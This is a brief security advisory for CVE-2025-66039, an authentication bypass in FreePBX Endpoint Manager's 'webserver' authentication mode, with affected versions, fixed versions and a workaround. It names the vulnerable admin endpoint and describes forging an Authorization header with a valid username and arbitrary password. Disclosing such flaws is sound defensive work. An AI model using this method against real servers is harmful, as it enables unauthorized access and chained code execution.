CVE-2025-66039

Name of the Vulnerable Software and Affected Versions FreePBX Endpoint Manager versions 16.0.0 through 16.0.43 FreePBX Endpoint Manager versions 17.0.0 through 17.0.22

Description The FreePBX Endpoint Manager module contains a flaw in its authentication mechanism when the authentication type is set to "webserver." The system incorrectly verifies incoming requests, allowing an attacker to bypass authentication by providing a valid username in the Authorization header, regardless of the password. This allows unauthorized access to the system. The vulnerability can be exploited by sending a crafted HTTP request to the /admin/config.php?display=epm advanced&view=settings endpoint with a forged Authorization header. The username in the header needs to be valid, but the password can be arbitrary. Successful exploitation can lead to SQL injection and remote code execution when chained with other flaws.

Recommendations FreePBX Endpoint Manager versions 16.0.0 through 16.0.43: Update to version 16.0.44 or later. FreePBX Endpoint Manager versions 17.0.0 through 17.0.22: Update to version 17.0.23 or later. As a temporary measure, disable the "webserver" authentication type if it is not required.